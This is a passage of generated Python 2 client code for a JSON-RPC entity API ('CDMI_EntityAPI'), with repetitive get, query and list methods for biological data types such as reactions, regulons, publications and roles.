'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Protocol(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Protocol',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Publication(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Publication',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Publication(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Publication',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Publication(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Publication',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Reaction(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Reaction',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Reaction(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Reaction',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Reaction(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Reaction',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_ReactionInstance(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_ReactionInstance',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_ReactionInstance(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_ReactionInstance',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_ReactionInstance(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_ReactionInstance',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Regulator(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Regulator',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Regulator(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Regulator',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Regulator(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Regulator',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Regulog(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Regulog',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Regulog(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Regulog',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Regulog(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Regulog',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_RegulogCollection(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_RegulogCollection',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_RegulogCollection(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_RegulogCollection',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_RegulogCollection(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_RegulogCollection',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Regulome(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Regulome',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Regulome(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Regulome',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Regulome(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Regulome',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Regulon(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Regulon',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Regulon(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Regulon',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Regulon(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Regulon',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_ReplicateGroup(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_ReplicateGroup',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_ReplicateGroup(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_ReplicateGroup',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_ReplicateGroup(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_ReplicateGroup',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Role(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Role',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Role(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Role',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Role(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Role',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_SSCell(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_SSCell',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_SSCell(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_SSCell',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_SSCell(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_SSCell',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_SSRow(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_SSRow',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
